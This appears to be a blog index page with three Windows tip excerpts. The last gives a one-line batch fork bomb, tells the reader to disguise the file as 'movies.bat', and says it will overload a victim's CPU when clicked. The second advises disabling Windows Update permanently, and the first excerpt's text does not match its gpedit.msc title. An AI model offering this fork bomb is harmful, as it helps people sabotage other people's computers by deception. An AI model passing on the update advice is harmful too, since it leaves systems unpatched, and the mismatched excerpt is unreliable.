How To Fix gpedit.msc Missing in Windows 10

Have you come across the situation where you can’t open Task Manager in Windows 10? You right-click on the taskbar, but find the Start Task Manager is grey. You press “Ctrl + Alt + Del” key combination, but find the “Start Task Manager” is lost on the screen. You run taskmgr in Run box, but receive theContinue reading “How To Fix gpedit.msc Missing in Windows 10”

How to Disable Windows Update on Windows 10 Permanently

Step 1. Open Run and type services.msc and click OK. Step 2. Find Windows Update and Right click Windows Update and select Properties. On General>Service status select Stop and on Startup type select disabled. On Recovery>First Failure set as Take No Action and on Reset fail count after to 0 days. Select Apply>OK. Close services.msc. Step 3. OpenContinue reading “How to Disable Windows Update on Windows 10 Permanently”

Create a Virus to make the Computer freezed using Batch Programming for Windows

Copy this code to notepad: %0|%0 Save the file with .bat extension(For eg: movies.bat). That’s all once your victim clicked this file,the CPU will be overloaded. Don’t worry it will be come to normal operation after restarting. All Done!